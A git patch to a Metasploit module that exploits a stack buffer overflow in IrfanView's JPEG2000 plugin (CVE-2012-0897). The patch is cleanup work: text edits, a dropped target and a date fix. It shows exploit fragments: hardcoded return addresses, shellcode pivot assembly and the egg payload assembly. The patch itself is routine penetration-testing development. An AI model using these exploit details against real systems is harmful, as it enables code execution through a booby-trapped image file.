From 5dbfb7b9aa6b675d53fc996bad6400c2ff5e664c Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sat, 30 Jun 2012 14:18:25 +0200 Subject: [PATCH] last cleanup --- .../windows/fileformat/irfanview_jpeg2000_bof.rb | 15 ++++++--------- 1 file changed, 6 insertions(+), 9 deletions(-) diff --git a/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb b/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb index fe7eddd6f9..a456210df2 100644 --- a/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb +++ b/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb @@ -22,9 +22,10 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Irfanview JPEG2000 <= v4.3.2.0 jp2 Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow vulnerability in - version <= 4.3.2.0 of Irfanview's JPEG2000.dll plugin. The vulnerability is - triggered via parsing an invalid qcd chunk structure and specfiying a - malformed qcd size and data. + version <= 4.3.2.0 of Irfanview's JPEG2000.dll plugin. This exploit has been + tested on a specific version of irfanview (v4.3.2), although other versions may + work also. The vulnerability is triggered via parsing an invalid qcd chunk + structure and specifying a malformed qcd size and data. Payload delivery and vulnerability trigger can be executed in multiple ways. The user can double click the file, use the file dialog, open via the icon @@ -43,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'CVE', '2012-0897' ], [ 'OSVDB', '78333'], [ 'BID', '51426' ], - [ 'URL', 'http://www.greyhathacker.net/?p=525' ] + [ 'URL', 'http://www.greyhathacker.net/?p=525' ], ], 'Platform' => [ 'win' ], 'DefaultOptions' => @@ -59,10 +60,9 @@ class Metasploit3 < Msf::Exploit::Remote 'Targets' => [ # push esp; retn [i_view32.exe] - [ 'Irfanview 4.33 / Plugins 4.32 / Windows Universal', { 'Ret' => 0x0049a6b4 } ], [ 'Irfanview 4.32 / Plugins 4.32 / Windows Universal', { 'Ret' => 0x004819d8 } ] ], - 'DisclosureDate' => 'Jun 24 2011', + 'DisclosureDate' => 'Jan 16 2012', 'DefaultTarget' => 0)) register_options( @@ -179,9 +179,6 @@ class Metasploit3 < Msf::Exploit::Remote pivot = Metasm::Shellcode.assemble(Metasm::Ia32.new, pivot).encode_string - # pass 'cmp dword ptr [eax+ebx*4],ebp' - pivot << "\xff\x66" # we use this to reach the end of our function - qcd_data << encode_bytes(pivot) qcd_data << egg